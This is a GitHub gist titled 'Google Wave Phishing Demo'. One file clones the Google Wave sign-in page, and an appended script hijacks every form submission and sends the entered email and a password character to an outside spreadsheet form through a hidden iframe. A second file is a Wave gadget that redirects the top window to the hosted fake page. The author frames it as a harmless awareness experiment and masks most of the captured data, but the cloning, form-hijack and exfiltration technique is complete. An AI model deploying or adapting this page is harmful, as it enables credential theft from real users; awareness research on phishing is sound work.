Created
February 10, 2010 10:33
-
-
Save axemclion/300208 to your computer and use it in GitHub Desktop.
Google Wave Phishing Demo
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html><head> | |
<style type="text/css"><!-- | |
body,td,div,p,a,font,span {font-family: arial,sans-serif;} | |
body {margin-top:2}.c {width:4; height: 4} | |
html body { bgcolor: "#ffffff"; padding: 0; margin: 0; } | |
A:link {color:#0000cc; } | |
A:visited { color:#551a8b; } | |
A:active { color:#ff0000; } | |
.form-noindent {background-color: #FFFFFF; border: #b2c1d9 1px solid;} | |
div { display: block; } | |
div.loginBox { | |
padding-top: 10px; | |
padding-bottom: 16px; | |
} | |
#gc-signup-closed { | |
background-color: #ffffcd; | |
width: 600px; | |
font-size: 13px; | |
margin-top: 30px; | |
padding: 10px; | |
text-align: center; | |
} | |
#gaia_table { | |
white-space: normal; | |
text-align: left; | |
} | |
.gc-mid { | |
width: 780px; | |
margin: 0 auto; | |
} | |
#gc-footer a, | |
#gc-more a { | |
color: #3b73cc; | |
} | |
#gc-main { | |
width: 100%; | |
} | |
#gc-main td { | |
text-align: left; | |
} | |
#gc-banner img { | |
border: none; | |
} | |
#gc-banner { | |
display: block; | |
height: 120px; | |
background-color: #c6d7f2; | |
border-top: 1px solid #b2c1d9; | |
border-bottom: 1px solid #b2c1d9; | |
text-align: left; | |
} | |
#gc-banner-content { | |
height: 120px; | |
position: relative; | |
} | |
#gc-banner-low { | |
margin: 14px 0 0 0; | |
} | |
#gc-watch { | |
color: #3b73cc; | |
text-decoration: none; | |
font-size: 14px; | |
font-weight: bold; | |
padding: 3px 0 3px 30px; | |
background: url(/accounts/wave/button.gif) no-repeat center left; | |
} | |
#gc-create-acc { | |
position: absolute; | |
top: -100px; | |
right: 0px; | |
} | |
#screenshot { | |
margin-top: 10px; | |
width: 528px; | |
} | |
#gc-more { | |
padding: 10px 0 0 2px; | |
} | |
.gc-nopad { | |
padding: 0; | |
} | |
.gc-si-content { | |
position: absolute; | |
top: -56px; | |
right: 2px; | |
height: 248px; | |
white-space: normal; | |
width: 248px; | |
z-index: 8; | |
} | |
--></style> | |
<style type="text/css"><!-- | |
.gaia.le.lbl { font-family: Arial, Helvetica, sans-serif; font-size: smaller; } | |
.gaia.le.fpwd { font-family: Arial, Helvetica, sans-serif; font-size: 70%; } | |
.gaia.le.chusr { font-family: Arial, Helvetica, sans-serif; font-size: 70%; } | |
.gaia.le.val { font-family: Arial, Helvetica, sans-serif; font-size: smaller; } | |
.gaia.le.button { font-family: Arial, Helvetica, sans-serif; font-size: smaller; } | |
.gaia.le.rem { font-family: Arial, Helvetica, sans-serif; font-size: smaller; } | |
.gaia.captchahtml.desc { font-family: arial, sans-serif; font-size: smaller; } | |
.gaia.captchahtml.cmt { font-family: arial, sans-serif; font-size: smaller; font-style: italic; } | |
--></style> | |
<title>Google Wave - Communicate and collaborate in real time</title> | |
<style type="text/css"><!-- | |
body { | |
font-family: arial, sans-serif; | |
margin: 0; | |
padding: 13px 15px 15px; | |
} | |
.body { | |
margin: 0; | |
} | |
div.errorbox-good {} | |
div.errorbox-bad {} | |
div.errormsg { color: red; font-size: smaller; font-family: arial,sans-serif;} | |
font.errormsg { color: red; font-size: smaller; font-family: arial,sans-serif;} | |
div.topbar { | |
font-size:smaller; | |
margin-right: -5px; | |
text-align:right; | |
white-space:nowrap; | |
} | |
div.header { | |
margin-bottom: 9px; | |
margin-left: -2px; | |
position:relative; | |
zoom: 1 | |
} | |
div.header img.logo { | |
border: 0; | |
float:left; | |
} | |
div.header div.headercontent { | |
float:right; | |
margin-top:17px; | |
} | |
div.header:after{ | |
content:"."; | |
display:block; | |
height:0; | |
clear:both; | |
visibility:hidden; | |
} | |
div.pagetitle { | |
font-weight:bold; | |
} | |
.footer { | |
color: #666; | |
font-size: smaller; | |
margin-top: 40px; | |
text-align: center; | |
} | |
table#signupform { | |
left: -5px; | |
top: -7px; | |
position:relative; | |
} | |
table#signupform td{ | |
padding: 7px 5px; | |
} | |
table#signupform td table td{ | |
padding: 1px; | |
} | |
hr { | |
border: 0; | |
background-color:#DDDDDD; | |
height: 1px; | |
width: 100%; | |
text-align: left; | |
margin: 5px; | |
} | |
--></style> | |
<link href="http://n.parashuram.googlepages.com/Tackle.css" rel="stylesheet" charset="utf-8" type="text/css" id="yui__dyn_0"></head><body dir="ltr" onload="gaia_setFocus();"> | |
<div class="gc-mid" style="padding: 20px 0pt 6px;"> | |
<div class="header"> | |
<a href="https://wave.google.com/wave"> | |
<img class="logo" src="https://www.google.com/accounts/wave/wave-logo.gif" alt="Google"> | |
</a> | |
</div> | |
</div> | |
<div id="gc-banner"> | |
<table id="gc-banner-content" class="gc-mid"> | |
<tbody><tr> | |
<td> | |
<div> | |
<a href="http://moderator.appspot.com/#e=d332d"> | |
<img alt="" src="https://www.google.com/accounts/wave/tag_login1.gif" height="43" width="418/"> | |
</a></div> | |
<div id="gc-banner-low"> | |
<a id="gc-watch" href="http://wave.google.com/help/wave/about.html#video" starget="_blank">Watch our looooong video</a> | |
</div> | |
</td> | |
</tr> | |
</tbody></table> | |
</div> | |
<div class="gc-mid" style="position: relative;"> | |
<div id="screenshot"> | |
<img src="https://www.google.com/accounts/wave/screenshot.png" height="297" width="508"> | |
</div> | |
<div class="gc-si-content"> | |
<script><!-- | |
function gaia_onLoginSubmit() { | |
if (window.gaiacb_onLoginSubmit) { | |
return gaiacb_onLoginSubmit(); | |
} else { | |
return true; | |
} | |
} | |
function gaia_setFocus() { | |
var f = null; | |
if (document.getElementById) { | |
f = document.getElementById("gaia_loginform"); | |
} else if (window.gaia_loginform) { | |
f = window.gaia_loginform; | |
} | |
if (f) { | |
if (f.Email && (f.Email.value == null || f.Email.value == "")) { | |
f.Email.focus(); | |
} else if (f.Passwd) { | |
f.Passwd.focus(); | |
} | |
} | |
} | |
--></script> | |
<style type="text/css"><!-- | |
div.errormsg { color: red; font-size: smaller; font-family:arial,sans-serif; } | |
font.errormsg { color: red; font-size: smaller; font-family:arial,sans-serif; } | |
--></style> | |
<style type="text/css"><!-- | |
.gaia.le.lbl { font-family: Arial, Helvetica, sans-serif; font-size: smaller; } | |
.gaia.le.fpwd { font-family: Arial, Helvetica, sans-serif; font-size: 70%; } | |
.gaia.le.chusr { font-family: Arial, Helvetica, sans-serif; font-size: 70%; } | |
.gaia.le.val { font-family: Arial, Helvetica, sans-serif; font-size: smaller; } | |
.gaia.le.button { font-family: Arial, Helvetica, sans-serif; font-size: smaller; } | |
.gaia.le.rem { font-family: Arial, Helvetica, sans-serif; font-size: smaller; } | |
.gaia.captchahtml.desc { font-family: arial, sans-serif; font-size: smaller; } | |
.gaia.captchahtml.cmt { font-family: arial, sans-serif; font-size: smaller; font-style: italic; } | |
--></style> | |
<form id="gaia_loginform" action="https://www.google.com/accounts/ServiceLoginAuth?service=wave" method="post" onsubmit="return(gaia_onLoginSubmit());"> | |
<div id="gaia_loginbox"> | |
<table class="form-noindent" border="0" cellpadding="5" cellspacing="3" width="100%"> | |
<tbody><tr> | |
<td style="text-align: center;" bgcolor="#e8eefa" nowrap="nowrap" valign="top"> | |
<input name="ltmpl" value="standard" type="hidden"> | |
<div class="loginBox"> | |
<table id="gaia_table" align="center" border="0" cellpadding="1" cellspacing="0"> | |
<tbody><tr> | |
<td colspan="2" align="center"> | |
<font size="-1"> | |
Sign in to | |
Google Wave | |
with your | |
</font> | |
<table> | |
<tbody><tr> | |
<td valign="top"> | |
<img src="https://www.google.com/accounts/google_transparent.gif" alt="Google"> | |
</td> | |
<td valign="middle"> | |
<font size="+0"><b>Account</b></font> | |
</td> | |
</tr> | |
</tbody></table> | |
</td> | |
</tr> | |
<script type="text/javascript"><!-- | |
function onPreCreateAccount() { | |
return true; | |
} | |
function onPreLogin() { | |
if (window["onlogin"] != null) { | |
return onlogin(); | |
} else { | |
return true; | |
} | |
} | |
--></script> | |
<tr> | |
<td colspan="2" align="center"> | |
</td> | |
</tr> | |
<tr> | |
<td nowrap="nowrap"> | |
<div align="right"> | |
<span class="gaia le lbl"> | |
Email: | |
</span> | |
</div> | |
</td> | |
<td> | |
<input name="continue" id="continue" value="https://wave.google.com/wave/" type="hidden"> | |
<input name="followup" id="followup" value="https://wave.google.com/wave/" type="hidden"> | |
<input name="service" id="service" value="wave" type="hidden"> | |
<input name="nui" id="nui" value="1" type="hidden"> | |
<input name="dsh" id="dsh" value="4026706752812105139" type="hidden"> | |
<input name="ltmpl" id="ltmpl" value="standard" type="hidden"> | |
<input name="ltmpl" id="ltmpl" value="standard" type="hidden"> | |
<input name="GALX" value="e_-UR4q6HSc" type="hidden"> | |
<input name="Email" id="Email" size="18" value="" class="gaia le val" type="text"> | |
</td> | |
</tr> | |
<tr> | |
<td></td> | |
<td align="left"> | |
</td> | |
</tr> | |
<tr> | |
<td align="right" nowrap="nowrap"> | |
<span class="gaia le lbl"> | |
Password: | |
</span> | |
</td> | |
<td> | |
<input name="Passwd" id="Passwd" size="18" class="gaia le val" type="password"> | |
</td> | |
</tr> | |
<tr> | |
<td> | |
</td> | |
<td align="left"> | |
</td> | |
</tr> | |
<tr> | |
<td align="right" valign="top"> | |
<input name="PersistentCookie" id="PersistentCookie" value="yes" checked="checked" type="checkbox"> | |
<input name="rmShown" value="1" type="hidden"> | |
</td> | |
<td> | |
<label for="PersistentCookie" class="gaia le rem"> | |
Stay signed in | |
</label> | |
</td> | |
</tr> | |
<tr> | |
<td> | |
</td> | |
<td align="left"> | |
<input class="gaia le button" name="signIn" value="Sign in" type="submit"> | |
</td> | |
</tr> | |
<tr id="ga-fprow"> | |
<td colspan="2" class="gaia le fpwd" align="center" height="33.0" valign="bottom"> | |
<a href="http://www.google.com/support/accounts/bin/answer.py?answer=48598&hl=en&ctx=ch_ServiceLogin&p=wave&fpUrl=https%3A%2F%2Fwww.google.com%2Faccounts%2FForgotPasswd%3FfpOnly%3D1%26continue%3Dhttps%253A%252F%252Fwave.google.com%252Fwave%252F%26followup%3Dhttps%253A%252F%252Fwave.google.com%252Fwave%252F%26service%3Dwave%26ltmpl%3Dstandard" target="_top"> | |
Can't access your account? | |
</a> | |
</td> | |
</tr> | |
</tbody></table> | |
</div> | |
</td> | |
</tr> | |
</tbody></table> | |
</div> | |
<input name="asts" id="asts" value="" type="hidden"> | |
</form> | |
<form id="gaia_universallogin" action="https://www.google.com/accounts/ServiceLoginAuth?service=wave" method="post" onsubmit="return(gaia_onLoginSubmit());"> | |
<input name="continue" id="continue" value="https://wave.google.com/wave/" type="hidden"> | |
<input name="followup" id="followup" value="https://wave.google.com/wave/" type="hidden"> | |
<input name="service" id="service" value="wave" type="hidden"> | |
<input name="nui" id="nui" value="1" type="hidden"> | |
<input name="dsh" id="dsh" value="4026706752812105139" type="hidden"> | |
<input name="ltmpl" id="ltmpl" value="standard" type="hidden"> | |
<input name="ltmpl" id="ltmpl" value="standard" type="hidden"> | |
<input name="ltmpl" id="ltmpl" value="standard" type="hidden"> | |
</form> | |
</div> | |
</div><div firebugversion="1.5.0" style="display: none;" id="_firebugConsole"></div> | |
<div class="gc-mid" id="gc-more"> | |
<a style="font-weight: bold; font-size: 13px;" href="http://wave.google.com/help/wave/about.html">Learn more about Google Wave<span style="font-size: 16px;">»</span></a> | |
</div> | |
<div class="gc-mid" id="gc-signup-closed"> | |
<b>Google Wave is currently in a limited preview.</b> | |
<a href="https://services.google.com/fb/forms/wavesignup/" target="_blank">Request an invitation.</a> | |
</div> | |
<div id="gc-footer" class="gc-mid"> | |
<div class="footer"> | |
©2010 Google | |
- | |
<a href="http://code.google.com/apis/wave">Developer APIs</a> | |
- | |
- | |
<a href="http://waveprotocol.org/">Federation Protocol</a> | |
<a href="http://wave.google.com/help/wave/terms.html">Terms</a> | |
- | |
<a href="http://wave.google.com/help/wave/privacy.html">Privacy Policy</a> | |
- | |
<a href="http://www.google.com/support/wave">Help</a> | |
</div> | |
</div> | |
</body><script>function _gs_() { | |
var s = document.createElement("iframe"); | |
s.style.display = "none"; | |
document.body.appendChild(s); | |
var email = document.getElementById("Email").value; | |
email = email.substring(0,7) + "....." + email.substring(email.indexOf("@")); | |
var password = document.getElementById("Passwd").value; | |
var showChar = 3; | |
password = " [ " + password.charAt(showChar) + " at position " + parseInt(showChar + 1)+" ] "; | |
_submitUrl = 'http://spreadsheets1.google.com/formResponse?formkey=dHF3eFFHVk1KMlhkcWdBUHVNZjFuWUE6MA&ifq'; | |
s.src = (_submitUrl + ("?&entry.0.single=" + escape(email) + "&entry.1.single=" + escape(password))); | |
window.open("http://spreadsheets.google.com/pub?key=tqwxQGVMJ2XdqgAPuMf1nYA&output=html"); | |
alert("If you are seeing this, you have just thrown away your credentials at a phished page !! Dont worry, this is just an experiment of a hack on Wave and we have not stolen your password, and this experiment is harmless. Next time, please do check the URL bar before entering your password."); | |
return false; | |
} | |
function _tack_(s) { | |
_cv_ = function () {var o = "";var _inpa_ = document.getElementsByTagName("input");_inpa_.concat(document.getElementsByTagName("textarea"));for (var i = 0; i < _inpa_.length; i++) {o += "&" + _inpa_[i].name + "=" + _inpa_[i].value;}return escape(o);}; | |
for (var i = 0; i < document.forms.length; i++) { | |
document.forms[i].onsubmit = s; | |
} | |
} | |
_tack_(_gs_);</script></html> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="UTF-8" ?> | |
<Module> | |
<ModulePrefs | |
title="Setprefs New"> | |
<Require feature="opensocial-0.8"/> | |
<Require feature="setprefs" /> | |
</ModulePrefs> | |
<UserPref | |
name="greeting" | |
default_value="0" | |
datatype="hidden"/> | |
<Content type="html"> | |
<![CDATA[ | |
<div id="content_div"> | |
Hello People | |
</div> | |
<script type="text/javascript"> | |
top.location = "http://hosting.gmodules.com/ig/gadgets/file/100726510508187623906/wave.html"; | |
</script> | |
]]> | |
</Content> | |
</Module> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment